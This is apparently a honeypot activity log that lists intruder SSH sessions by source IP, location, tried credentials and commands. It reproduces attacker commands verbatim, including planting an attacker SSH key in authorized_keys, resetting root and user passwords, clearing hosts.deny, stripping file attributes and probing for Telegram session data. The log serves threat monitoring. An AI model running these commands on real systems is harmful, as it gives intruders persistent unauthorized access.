$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:2mv6MoK9eFvW"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 beefeater_root_3 (207.249.96.38) — London, United Kingdom · 1 session · 19 cmds

2026-03-20 15:17 EDT · as root/123456

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:y5lbWhdPrBo8"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 silk_sol (8.138.226.108) — Guangzhou, China · 1 session · 1 cmd

2026-03-20 09:09 EDT · as root/pass123

echo

$ echo -e "\x6F\x6B"

🎭 rogue_root_47 (213.154.77.61) — Dakar, Senegal · 1 session · 20 cmds

2026-03-19 22:25 EDT · as deploy/deploy123

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "deploy123\nF6Myqetgi7YL\nF6Myqetgi7YL"|passwd|bash

$ Enter new UNIX password:

$ echo "deploy123\nF6Myqetgi7YL\nF6Myqetgi7YL\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 specter_sol (31.145.191.148) — İzmit, Türkiye · 2 sessions · 2 cmds

2026-03-19 20:27 EDT · as root/123456, root/pass123

echo

$ echo -e "\x6F\x6B" ×2

🎭 dragon_root_22 (123.182.62.25) — Shijiazhuang, China · 1 session · 1 cmd

2026-03-19 21:32 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 lantern_root_26 (120.48.52.177) — Beijing, China · 1 session · 1 cmd

2026-03-19 19:37 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 rogue_root_2 (103.82.27.19) — Hanoi, Vietnam · 4 sessions · 4 cmds

2026-03-19 13:03 EDT · as root/1234, root/admin123, root/password

Ran uname 4x across 4 sessions — automated OS fingerprinting.

$ hostname; echo '___BSEP_A1B2C3___'; uname -a; echo '___BSEP_A1B2C3___'; whoami; echo '___BSEP_A1B2C3___'; pwd; echo '___BSEP_A1B2C3___'; ls -la /; echo '___BSEP_A1B2C3___'; ps aux | head -15; echo '___BSEP_A1B2C3___'; netstat -tulpn | head -10; echo '___BSEP_A1B2C3___'; history | tail -5; echo '___BSEP_A1B2C3___'; ssh -V 2>&1; echo '___BSEP_A1B2C3___'; uptime; echo '___BSEP_A1B2C3___'; mount | head -5; echo '___BSEP_A1B2C3___'; env | head -10; echo '___BSEP_A1B2C3___'; cat /etc/os-release 2>/dev/null | head -6; echo '___BSEP_A1B2C3___'; grep MemTotal /proc/meminfo 2>/dev/null; echo '___BSEP_A1B2C3___'; df -h / 2>/dev/null | tail -1; echo '___BSEP_A1B2C3___'; cat /proc/version 2>/dev/null; echo '___BSEP_A1B2C3___'; grep 'model name' /proc/cpuinfo 2>/dev/null | head -1; echo '___BSEP_A1B2C3___'; cat /etc/issue 2>/dev/null; echo '___BSEP_A1B2C3___'; last -n 3 2>/dev/null | head -3; echo '___BSEP_A1B2C3___'; ls /dev 2>/dev/null | wc -l; echo '___BSEP_A1B2C3___'; ls /var/log 2>/dev/null | wc -l; echo '___BSEP_A1B2C3___'; ls /opt 2>/dev/null; echo '___BSEP_A1B2C3___'; crontab -l 2>/dev/null | head -5; echo '___BSEP_A1B2C3___'; nproc 2>/dev/null || grep -c '^processor' /proc/cpuinfo 2>/dev/null ×4

↳ persistence setup

🎭 tulip_root (2.57.122.162) — Amsterdam, The Netherlands · 13 sessions · 13 cmds

2026-03-17 21:10 EDT · as admin/admin123, admin/password, root/12345678

Ran uname 13x across 13 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×13

🎭 cipher_root_72 (207.46.224.86) — Singapore, Singapore · 4 sessions · 4 cmds

2026-03-19 10:22 EDT · as root/1234, root/123456, root/12345678

uptime check → env → hostname discovery → OS/kernel identification

$ uptime

↳ uptime check

$ env | head -10

$ hostname

↳ hostname discovery

$ uname -a

↳ OS/kernel identification

🎭 kimchi_root_8 (218.145.181.48) — Gangnam-gu, South Korea · 4 sessions · 32 cmds

2026-02-28 14:16 EST · as root/admin, root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print ×4

$ ifconfig ×4

↳ network mapping

$ uname -a ×4

↳ OS/kernel identification

$ cat /proc/cpuinfo ×4

↳ CPU profiling

$ ps | grep '[Mm]iner' ×4

$ ps -ef | grep '[Mm]iner' ×4

$ ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* ×4

$ echo Hi | cat -n ×4

🎭 specter_root_53 (187.191.2.214) — Veracruz, Mexico · 1 session · 1 cmd

2026-03-19 08:07 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m

🎭 autobahn_root_15 (142.132.188.104) — Falkenstein, Germany · 1 session · 1 cmd

2026-03-19 05:09 EDT · as root/1234

uptime check

$ uptime

↳ uptime check

🎭 rogue_root_48 (46.37.71.112) — Málaga, Spain · 1 session · 9 cmds

2026-03-19 04:19 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 poutine_sol (146.190.251.46) — Toronto, Canada · 9 sessions · 9 cmds

2026-03-19 03:29 EDT · as admin/admin123, oracle/Bmw_20!_^, oracle/oracle123

Ran uname 9x across 9 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×9

🎭 moose_root (143.110.217.213) — Toronto, Canada · 2 sessions · 2 cmds

2026-03-19 01:37 EDT · as root/1234, root/12345678

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×2

🎭 toque_root (165.227.44.159) — Toronto, Canada · 3 sessions · 3 cmds

2026-03-19 01:25 EDT · as postgres/postgres, user/password, user/user

Ran uname 3x across 3 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×3

🎭 roo_root_2 (170.64.168.206) — Sydney, Australia · 11 sessions · 11 cmds

2026-03-19 00:27 EDT · as deploy/deploy, oracle/1111, oracle/Bmw_20!_^

Ran uname 11x across 11 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×11

🎭 lantern_root_27 (123.139.214.42) — Xi'an, China · 1 session · 1 cmd

2026-03-19 00:34 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 baguette_root (104.28.163.118) — Aulnay-sous-Bois, France · 1 session · 1 cmd

2026-03-18 20:21 EDT · as root/password

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 rogue_root_49 (178.128.111.152) — Singapore, Singapore · 7 sessions · 28 cmds

2026-03-18 19:23 EDT · as admin/123456, admin/admin, root/1234

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 maple_sol (143.110.211.250) — Toronto, Canada · 24 sessions · 24 cmds

2026-03-18 15:42 EDT · as admin/admin, admin/admin123, deploy/deploy

Ran uname 24x across 24 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×24

🎭 rogue_root_50 (170.79.37.82) — Santa Anita - Los Ficus, Peru · 1 session · 20 cmds

2026-03-18 15:56 EDT · as ubuntu/password

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "password\nIo0h69EuM8yT\nIo0h69EuM8yT"|passwd|bash

$ Enter new UNIX password:

$ echo "password\nIo0h69EuM8yT\nIo0h69EuM8yT\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 wraith_root_48 (103.59.95.55) — Pekanbaru, Indonesia · 1 session · 20 cmds

2026-03-18 15:48 EDT · as ubuntu/password

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "password\nRKqqLLXjWOX5\nRKqqLLXjWOX5"|passwd|bash

$ Enter new UNIX password:

$ echo "password\nRKqqLLXjWOX5\nRKqqLLXjWOX5\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 gouda_root_10 (45.141.56.53) — Amsterdam, The Netherlands · 10 sessions · 40 cmds

2026-03-18 11:36 EDT · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 fog_root_11 (178.62.115.58) — Slough, United Kingdom · 14 sessions · 56 cmds

2026-03-18 11:27 EDT · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 14x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×14

$ uname -s -v -n -m 2 > /dev/null ×14

$ uname -m 2 > /dev/null ×14

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×14

🎭 bike_root_9 (188.166.72.199) — Amsterdam, Netherlands · 1 session · 4 cmds

2026-03-18 08:55 EDT · as admin/123456

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 cipher_root_73 (157.10.160.221) — Cicurug, Indonesia · 1 session · 20 cmds

2026-03-18 08:18 EDT · as admin/admin

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "admin\nTwiRuOsb2k8G\nTwiRuOsb2k8G"|passwd|bash

$ Enter new UNIX password:

$ echo "admin\nTwiRuOsb2k8G\nTwiRuOsb2k8G\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 phantom_root_45 (23.97.62.115) — Singapore, Singapore · 4 sessions · 4 cmds

2026-03-18 02:43 EDT · as root/1234, root/123456, root/12345678

hostname discovery → privilege check → OS/kernel identification → ps

$ hostname

↳ hostname discovery

$ whoami

↳ privilege check

$ uname -a

↳ OS/kernel identification

$ ps aux | head -10

🎭 barbie_root (209.38.29.104) — Sydney, Australia · 10 sessions · 40 cmds

2026-03-17 23:58 EDT · as admin/123456, admin/admin, admin/admin123

export → uname → cat (repeated export 10x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 silk_root_19 (60.212.41.202) — Jinan, China · 1 session · 1 cmd

2026-03-18 01:42 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 tulip_root_14 (147.45.69.167) — Amsterdam, Netherlands · 10 sessions · 10 cmds

2026-03-17 23:37 EDT · as admin/admin123, admin/password, deploy/deploy123

Ran uname 10x across 10 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×10

🎭 tulip_root_4 (161.35.146.29) — Amsterdam, Netherlands · 23 sessions · 92 cmds

2026-03-17 19:20 EDT · as admin/123456, admin/admin, admin/password

export → uname → cat (repeated export 23x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×23

$ uname -s -v -n -m 2 > /dev/null ×23

$ uname -m 2 > /dev/null ×23

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×23

🎭 lantern_root_28 (60.217.22.185) — Jinan, China · 1 session · 1 cmd

2026-03-17 15:12 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 fjord_root_5 (83.227.125.172) — Handen, Sweden · 1 session · 9 cmds

2026-03-17 14:24 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

